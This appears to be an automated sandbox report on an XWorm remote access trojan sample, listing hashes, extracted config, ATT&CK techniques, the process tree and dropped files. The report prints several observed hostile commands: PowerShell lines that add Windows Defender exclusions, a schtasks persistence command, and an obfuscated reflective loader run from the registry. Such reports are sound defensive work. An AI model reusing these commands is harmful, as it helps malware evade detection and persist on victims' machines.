xworm | 713970f3fdf9d2d5a7819c8a84731f331277c7c75f1b88b60c22fabc9f2e2159

Analysis

max time kernel
150s
max time network
155s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
11/11/2023, 15:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Xpub updated.exe
Size

1.0MB
MD5

25c2bf24f3b8f423a4181c7f67ae50b5
SHA1

2190d3faa60c34fc4b9a237bba9abac14fc28021
SHA256

713970f3fdf9d2d5a7819c8a84731f331277c7c75f1b88b60c22fabc9f2e2159
SHA512

2f5d0e84db21fe25d3c3e5c647f12b8b292411682514d19d55ccfa0491b8d279872a1866e2af685b870a752be84cf2f1b56f40c37afb3e2cf1135fbbc4fe9cf7
SSDEEP

24576:nyhVzcJg9bxWnM8/uGu7Gzw/Fe552DydluAqYOn+YRD331:yHxl8/q7JFxglVqLnBD331

Score

10^/10

xworm persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

6dscd9NcNiKn8WNo

Attributes

Install_directory
%AppData%
install_file
$k.exe
pastebin_url
https://pastebin.com/raw/s2R3Fsug

aes.plain

Signatures

Detect Xworm Payload 7 IoCs

resource	yara_rule
behavioral1/files/0x0009000000014df5-23.dat	family_xworm
behavioral1/files/0x0009000000014df5-26.dat	family_xworm
behavioral1/memory/1724-30-0x0000000000FA0000-0x0000000000FB2000-memory.dmp	family_xworm
behavioral1/files/0x0009000000015619-199.dat	family_xworm
behavioral1/files/0x0009000000015619-200.dat	family_xworm
behavioral1/memory/2976-202-0x00000000009F0000-0x0000000000A02000-memory.dmp	family_xworm
behavioral1/files/0x0009000000015619-201.dat	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2564 created 420	2564	powershell.EXE	3

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Downloads MZ/PE file

Executes dropped EXE 7 IoCs

pid	Process
1892	AE-FREE.exe
1728	XBinderOutput.exe
1724	$k.exe
2528	$k install.exe
2976	$k.exe
2648	knwdex.exe
1944	Installer.exe

Loads dropped DLL 4 IoCs

pid	Process
2320	Xpub updated.exe
1936	Process not Found
2648	knwdex.exe
1944	Installer.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\$k = "C:\\Users\\Admin\\AppData\\Roaming\\$k.exe"	$k.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2564 set thread context of 2464	2564	powershell.EXE	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1680	schtasks.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 504c76f5c014da01	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	lsass.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	$k.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	$k.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	$k.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	$k.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1724	$k.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
2564	powershell.EXE
2564	powershell.EXE
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
2464	dllhost.exe
472	powershell.exe
1788	powershell.exe
2992	powershell.exe
288	powershell.exe
1724	$k.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	1724	$k.exe
Token: SeDebugPrivilege	2564	powershell.EXE
Token: SeDebugPrivilege	2564	powershell.EXE
Token: SeDebugPrivilege	2464	dllhost.exe
Token: SeDebugPrivilege	472	powershell.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	2992	powershell.exe
Token: SeDebugPrivilege	288	powershell.exe
Token: SeDebugPrivilege	1724	$k.exe
Token: SeDebugPrivilege	2976	$k.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1724	$k.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2320 wrote to memory of 1892	2320	Xpub updated.exe	31
PID 2320 wrote to memory of 1892	2320	Xpub updated.exe	31
PID 2320 wrote to memory of 1892	2320	Xpub updated.exe	31
PID 2320 wrote to memory of 1728	2320	Xpub updated.exe	28
PID 2320 wrote to memory of 1728	2320	Xpub updated.exe	28
PID 2320 wrote to memory of 1728	2320	Xpub updated.exe	28
PID 1892 wrote to memory of 2100	1892	AE-FREE.exe	30
PID 1892 wrote to memory of 2100	1892	AE-FREE.exe	30
PID 1892 wrote to memory of 2100	1892	AE-FREE.exe	30
PID 1892 wrote to memory of 2752	1892	AE-FREE.exe	32
PID 1892 wrote to memory of 2752	1892	AE-FREE.exe	32
PID 1892 wrote to memory of 2752	1892	AE-FREE.exe	32
PID 1728 wrote to memory of 1724	1728	XBinderOutput.exe	33
PID 1728 wrote to memory of 1724	1728	XBinderOutput.exe	33
PID 1728 wrote to memory of 1724	1728	XBinderOutput.exe	33
PID 1728 wrote to memory of 2528	1728	XBinderOutput.exe	34
PID 1728 wrote to memory of 2528	1728	XBinderOutput.exe	34
PID 1728 wrote to memory of 2528	1728	XBinderOutput.exe	34
PID 1728 wrote to memory of 2528	1728	XBinderOutput.exe	34
PID 1728 wrote to memory of 2528	1728	XBinderOutput.exe	34
PID 1728 wrote to memory of 2528	1728	XBinderOutput.exe	34
PID 1728 wrote to memory of 2528	1728	XBinderOutput.exe	34
PID 2708 wrote to memory of 2564	2708	taskeng.exe	37
PID 2708 wrote to memory of 2564	2708	taskeng.exe	37
PID 2708 wrote to memory of 2564	2708	taskeng.exe	37
PID 2564 wrote to memory of 2464	2564	powershell.EXE	38
PID 2564 wrote to memory of 2464	2564	powershell.EXE	38
PID 2564 wrote to memory of 2464	2564	powershell.EXE	38
PID 2564 wrote to memory of 2464	2564	powershell.EXE	38
PID 2564 wrote to memory of 2464	2564	powershell.EXE	38
PID 2564 wrote to memory of 2464	2564	powershell.EXE	38
PID 2564 wrote to memory of 2464	2564	powershell.EXE	38
PID 2564 wrote to memory of 2464	2564	powershell.EXE	38
PID 2564 wrote to memory of 2464	2564	powershell.EXE	38
PID 2464 wrote to memory of 420	2464	dllhost.exe	3
PID 2464 wrote to memory of 464	2464	dllhost.exe	1
PID 2464 wrote to memory of 480	2464	dllhost.exe	2
PID 480 wrote to memory of 2176	480	lsass.exe	41
PID 480 wrote to memory of 2176	480	lsass.exe	41
PID 480 wrote to memory of 2176	480	lsass.exe	41
PID 480 wrote to memory of 2176	480	lsass.exe	41
PID 480 wrote to memory of 2176	480	lsass.exe	41
PID 480 wrote to memory of 2176	480	lsass.exe	41
PID 480 wrote to memory of 2176	480	lsass.exe	41
PID 480 wrote to memory of 2176	480	lsass.exe	41
PID 480 wrote to memory of 2176	480	lsass.exe	41
PID 480 wrote to memory of 2176	480	lsass.exe	41
PID 480 wrote to memory of 296	480	lsass.exe	18
PID 480 wrote to memory of 1724	480	lsass.exe	33
PID 480 wrote to memory of 1724	480	lsass.exe	33
PID 480 wrote to memory of 1724	480	lsass.exe	33
PID 480 wrote to memory of 1724	480	lsass.exe	33
PID 480 wrote to memory of 1724	480	lsass.exe	33
PID 480 wrote to memory of 1724	480	lsass.exe	33
PID 480 wrote to memory of 1724	480	lsass.exe	33
PID 480 wrote to memory of 1724	480	lsass.exe	33
PID 480 wrote to memory of 1724	480	lsass.exe	33
PID 1724 wrote to memory of 472	1724	$k.exe	42
PID 1724 wrote to memory of 472	1724	$k.exe	42
PID 1724 wrote to memory of 472	1724	$k.exe	42
PID 1724 wrote to memory of 1788	1724	$k.exe	44
PID 1724 wrote to memory of 1788	1724	$k.exe	44
PID 1724 wrote to memory of 1788	1724	$k.exe	44
PID 1724 wrote to memory of 2992	1724	$k.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:296

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:480

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{04ce3458-9007-44b2-8431-59f630966e59}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2464

C:\Users\Admin\AppData\Local\Temp\Xpub updated.exe
"C:\Users\Admin\AppData\Local\Temp\Xpub updated.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2320
- C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe
  "C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1728
- - C:\Users\Admin\AppData\Local\Temp\$k.exe
    "C:\Users\Admin\AppData\Local\Temp\$k.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Modifies system certificate store
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\$k.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$k.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$k.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$k.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:288
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$k" /tr "C:\Users\Admin\AppData\Roaming\$k.exe"
      4⤵
      Creates scheduled task(s)
      PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\knwdex.exe
      "C:\Users\Admin\AppData\Local\Temp\knwdex.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2648
    - - C:\Users\Admin\AppData\Local\Apps\Installer.exe
        
        C:\Users\Admin\AppData\Local\Apps\Installer.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1944
- - C:\Users\Admin\AppData\Local\Temp\$k install.exe
    "C:\Users\Admin\AppData\Local\Temp\$k install.exe"
    3⤵
    - Executes dropped EXE
    PID:2528
- C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe
  "C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 0a
1⤵
PID:2100

C:\Windows\system32\taskeng.exe
taskeng.exe {20FCB303-117C-42AC-BAE6-87CCC3A931CB} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:2708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+'W'+'A'+'R'+''+'E'+'').GetValue(''+'$'+''+[Char](107)+'s'+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2564

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2176

C:\Windows\system32\taskeng.exe
taskeng.exe {A18725B3-5F52-4446-861F-A82D39279CC3} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]
1⤵
PID:2952
- C:\Users\Admin\AppData\Roaming\$k.exe
  C:\Users\Admin\AppData\Roaming\$k.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Apps\Installer.exe

Filesize
91KB

MD5
9b778cfe0e786463a843f7d98e38dc41

SHA1
1bc4def9348a341d9cc3e75fd28df09d1ba53f38

SHA256
8483f2e72d60c031df90acb798d909d567f07315367961a992daca6fd41b4876

SHA512
a8373d6073b490d40264015068f5379e1d2f4e778e21dfcd51fea835695fc3b9bd8e077de1b98da5232cb54fe9585828fa54963fa469b459c1296cded9274111

Download Submit
C:\Users\Admin\AppData\Local\Apps\python310.dll

Filesize
4.2MB

MD5
384349987b60775d6fc3a6d202c3e1bd

SHA1
701cb80c55f859ad4a31c53aa744a00d61e467e5

SHA256
f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

SHA512
6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\$k install.exe

Filesize
161KB

MD5
5e1781e69a041fc989cbb7abe704363b

SHA1
2ca02551ed6fefddd421f1303e81c4b8f0814130

SHA256
9e2f99749214d5f728d96ede1e0e6713895f6c01829f66573e06502917c4b42d

SHA512
aaf73335ddfb15614d6031f6724b8611b843aad9fbb111d517fc135954d7b7f065e4f6ac3d42bc12236459388befb5eded6a53a80b5efd6279e013b17b6b9b22

Download Submit
C:\Users\Admin\AppData\Local\Temp\$k.exe

Filesize
48KB

MD5
1e8a020876016dfb400e1f94db3dd866

SHA1
fbeb8ac7335c139b5d08f929e979d0aa317981e2

SHA256
463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2

SHA512
298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

Download Submit
C:\Users\Admin\AppData\Local\Temp\$k.exe

Filesize
48KB

MD5
1e8a020876016dfb400e1f94db3dd866

SHA1
fbeb8ac7335c139b5d08f929e979d0aa317981e2

SHA256
463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2

SHA512
298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

Download Submit
C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe

Filesize
1.1MB

MD5
17daa2459db2c35a6bce85f9c50ce6e1

SHA1
73812f97c50d8ec2540274b8524d0a1406937c04

SHA256
7d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2

SHA512
cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b

Download Submit
C:\Users\Admin\AppData\Local\Temp\AE-FREE.exe

Filesize
1.1MB

MD5
17daa2459db2c35a6bce85f9c50ce6e1

SHA1
73812f97c50d8ec2540274b8524d0a1406937c04

SHA256
7d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2

SHA512
cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab320A.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar325B.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe

Filesize
181KB

MD5
fe6bd020ec20bb2df56a84d14805627e

SHA1
9e091bc5b6e93c63a99329e4a1295a397f647abc

SHA256
e5d307d43f688475e5f513ea9b7ad1a916c2c3e4971f68debaf15a6549a295f3

SHA512
60322dce57b5c46d4712c6920ca7af58dc49d02bf332c0ba9c4ddec7dc524439652f7b99a34a5b88d4dea44f5504eeb7bbc85137a85bbce6eec8cfd3c199eb09

Download Submit
C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe

Filesize
181KB

MD5
fe6bd020ec20bb2df56a84d14805627e

SHA1
9e091bc5b6e93c63a99329e4a1295a397f647abc

SHA256
e5d307d43f688475e5f513ea9b7ad1a916c2c3e4971f68debaf15a6549a295f3

SHA512
60322dce57b5c46d4712c6920ca7af58dc49d02bf332c0ba9c4ddec7dc524439652f7b99a34a5b88d4dea44f5504eeb7bbc85137a85bbce6eec8cfd3c199eb09

Download Submit
C:\Users\Admin\AppData\Local\Temp\knwdex.exe

Filesize
17.8MB

MD5
adc21ba585ed59f51a2f04b51cf20727

SHA1
a0b10b8c8d7816045e5c193019a8303531d1197f

SHA256
f19529eb433f85dd5e733bd500f17a9bfdaa3df7f6ce6aa0c51be0c3f892465f

SHA512
5b1f39ec9ee37c72832b5cbc7820e8b123053715fb5628db208e1389107786f8e71747aa4c3b7203fb9c0fa601e20e53ae5329d3c1c66dbced033815ac1a1151

Download Submit
C:\Users\Admin\AppData\Local\Temp\knwdex.exe

Filesize
17.8MB

MD5
adc21ba585ed59f51a2f04b51cf20727

SHA1
a0b10b8c8d7816045e5c193019a8303531d1197f

SHA256
f19529eb433f85dd5e733bd500f17a9bfdaa3df7f6ce6aa0c51be0c3f892465f

SHA512
